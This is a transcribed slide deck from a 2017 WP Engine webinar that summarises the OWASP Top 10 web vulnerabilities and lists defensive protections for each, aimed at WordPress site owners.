Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Security Webinar: Harden the Heart of Your WordPress SiteSe

741 views

Published on

Discover the OWASP Top 10 web vulnerabilities and how to mitigate the risk associated with each for your website.

Register to watch on-demand webinar here: https://wpengine.com/resources/security-webinar-harden-heart-wordpress-site/

Published in: Internet
  • Be the first to comment

  • Be the first to like this

Security Webinar: Harden the Heart of Your WordPress SiteSe

  1. 1. #wpewebinar February 15, 2017 #wpewebinar
  2. 2. #wpewebinar CROP IMAGE TO GRAY BOX We’ll answer as many questions as we can after the presentation ASK QUESTIONS AS WE GO Slides and recording will be made available shortly after the webinar Use the “Questions” pane throughout the webinar
  3. 3. #wpewebinar WHAT YOU’LL LEARN: ● What is OWASP? ● What are the OWASP Top Ten? ● How each might affect your website ● How to mitigate risks for each vulnerability ● Q&A
  4. 4. #wpewebinar Security Engineer WP Engine Justin Dailey ● Background in HW and digital electronics ● Sports enthusiast ● Loves all things outdoors Security Architect WP Engine Will West ● Made a gatling gun with sonar sensor ● 6’8” Tall ● Does not play basketball
  5. 5. #wpewebinar OWASP
  6. 6. #wpewebinar The OWASP Top Ten
  7. 7. #wpewebinar CROP IMAGE TO GRAY BOX CROP IMAGE TO GRAY BOX CROP IMAGE TO GRAY BOX CROP IMAGE TO GRAY BOX CROP IMAGE TO GRAY BOX CROP IMAGE TO GRAY BOX CROP IMAGE TO GRAY BOX CROP IMAGE TO GRAY BOX CROP IMAGE TO GRAY BOX CROP IMAGE TO GRAY BOX Injection OWASP Top 10 Weak authentication and session management XSS Insecure Direct Object References Security Misconfiguration Sensitive Data Exposure Missing Function Level Access Control Cross Site Request Forgery Using Components with Known Vulnerabilities Unvalidated Redirects and Forwards A1 A2 A3 A4 A5 A6 A7 A8 A9 A10
  8. 8. #wpewebinar Poll: Are you currently doing anything to secure your website against these Top 10 threats?
  9. 9. #wpewebinar A1 Injection Description • Different types: SQL, LDAP, ORM, XML, XPath, Code Injection, Command Injection, Buffer Overflows • Execution of unintended commands • Unauthorized data access
  10. 10. #wpewebinar A1 Injection Description • Different types: SQL, LDAP, ORM, XML, XPath, Code Injection, Command Injection, Buffer Overflows • Execution of unintended commands • Unauthorized data access Protections • Enforce input type and length • Ensure special characters are escaped • Validate all input fields and use an input validation whitelist • Avoid dynamic queries or commands
  11. 11. #wpewebinar Description A2 Weak authentication and session management • Attacks take advantage of improper authentication or session management practices • Leads to access to sensitive information such as passwords, keys, or tokens • Execution of privileged application functions
  12. 12. #wpewebinar Description A2 Weak authentication and session management • Attacks take advantage of improper authentication or session management practices • Leads to access to sensitive information such as passwords, keys, or tokens • Execution of privileged application functions Protections • Follow standard and recommended practices for user management and authentication • Perform user and role validation on all actions • Use secure session cookie flags • Always use CSRF tokens with forms
  13. 13. #wpewebinar A3 Cross Site Scripting (XSS) Description • An application places data from untrusted sources into site content without performing proper validation and/or escaping • Allows client side script execution • Can lead to compromised credentials and sessions, site defacement, and redirection to malicious sites
  14. 14. #wpewebinar A3 Cross Site Scripting (XSS) Description • An application places data from untrusted sources into site content without performing proper validation and/or escaping • Allows client side script execution • Can lead to compromised credentials and sessions, site defacement, and redirection to malicious sites Protections • Positive input validation using correct character set • Sanitize input • Output encode all user data during upon rendering
  15. 15. #wpewebinar A4 Insecure Direct Object References Description • Reference to an internal object such as a file, directory, or database key is exposed • Leads to unauthorized data access directly or by manipulation
  16. 16. #wpewebinar A4 Insecure Direct Object References Description • Reference to an internal object such as a file, directory, or database key is exposed • Leads to unauthorized data access directly or by manipulation Protections • Ensure access control checks are performed when using direct object references • Use reference maps instead of direct reference such as IDs
  17. 17. #wpewebinar Description A5 Security Misconfiguration • Insecure server or application configurations that allow unintended access to data or application functions • Can be a result of naive configurations, default configurations, outdated software
  18. 18. #wpewebinar Description A5 Security Misconfiguration • Insecure server or application configurations that allow unintended access to data or application functions • Can be a result of naive configurations, default configurations, outdated software Protections • A repeatable and testable hardening process incorporating development, QA, and production • Regular update and patching processes • Periodic scans and audits
  19. 19. #wpewebinar A6 Sensitive Data Exposure Description • Improper protection and/or encryption of sensitive data such as personally identifiable information, payment methods, and credentials • Exposure can occur in rest or in transit • Can lead to fraud, PR nightmares, and further exploitation
  20. 20. #wpewebinar A6 Sensitive Data Exposure Description • Improper protection and/or encryption of sensitive data such as personally identifiable information, payment methods, and credentials • Exposure can occur in rest or in transit • Can lead to fraud, PR nightmares, and further exploitation Protections • Encrypt all sensitive data at rest and in transit • Avoid storing sensitive data at all costs • Use standard and modern cryptography and hashing algorithms
  21. 21. #wpewebinar A7 Missing Function Level Access Control Description • Authentication verification is performed on the front end (UI) but is not properly performed on application functions • Verification must be performed on all functions at all levels • Allows unauthorized access to functions and data
  22. 22. #wpewebinar A7 Missing Function Level Access Control Description • Authentication verification is performed on the front end (UI) but is not properly performed on application functions • Verification must be performed on all functions at all levels • Allows unauthorized access to functions and data Protections • Perform validations client side AND server side • Use explicit grants, deny by default
  23. 23. #wpewebinar Description A8 Cross Site Request Forgery • An attack forcing a logged in victim’s browser to send a forged HTTP request which includes local session information • Requests target vulnerable sites that do not perform proper request validation
  24. 24. #wpewebinar Description A8 Cross Site Request Forgery • An attack forcing a logged in victim’s browser to send a forged HTTP request which includes local session information • Requests target vulnerable sites that do not perform proper request validation Protections • Include an unpredictable CSRF token in each HTTP request
  25. 25. #wpewebinar A9 Using Components with Known Vulnerabilities Description • Known vulnerabilities in utilized libraries and frameworks can be compromised used readily available tools • Can allow attacks to bypass security measures through exploitation
  26. 26. #wpewebinar A9 Using Components with Known Vulnerabilities Description • Known vulnerabilities in utilized libraries and frameworks can be compromised used readily available tools • Can allow attacks to bypass security measures through exploitation Protections • Maintain awareness of the components and versions utilized by your application • Monitor the security of these components via public notifications such as vulnerability mailing lists etc • Establish and follow policies dictating what software components are acceptable to use
  27. 27. #wpewebinar A10 Unvalidated Redirects and Forwards Description • Use of redirects and forwards with untrusted data determining the destination pages • Redirection can be exploited to direct users to malicious sites performing phishing or malware distribution
  28. 28. #wpewebinar A10 Unvalidated Redirects and Forwards Description • Use of redirects and forwards with untrusted data determining the destination pages • Redirection can be exploited to direct users to malicious sites performing phishing or malware distribution Protections • Avoid redirects and forwards if possible • If they are used, do not include dynamic parameters in calculating the destination
  29. 29. #wpewebinar Slides and recording will be made available shortly after the webinar QUESTIONS AND ANSWERS
  30. 30. #wpewebinar 8 KEY SECURITY QUESTIONS YOUR HOSTING COMPANY SHOULD BE ABLE TO ANSWER RESOURCES OWASP TOP 10 2013 PROJECT OWASP VULNERABLE WEB APPLICATIONS DIRECTORY PROJECT LIVE INTERVIEW WITH DAVID ENDLER OF MANIFEST ON WEB SECURITY 15 WAYS TO HARDEN THE SECURITY OF YOUR WORDPRESS SITE RECORDED WEBINAR: TODAY’S WEBSITE SECURITY THREAT LANDSCAPE (FEATURING TONY PEREZ, SUCURI)
  31. 31. #wpewebinar CROP IMAGE TO GRAY BOX NEXT UP... Register Now: http://wpeng.in/ email Wednesday, Feb 22 11:00 a.m. CST, 12:00 p.m. EST, 9:00 a.m. PST, 5:00 p.m. UTC/GMT
  32. 32. #wpewebinar HELP US IMPROVE
  33. 33. #wpewebinar THANK YOU #wpewebinar @wpengine

×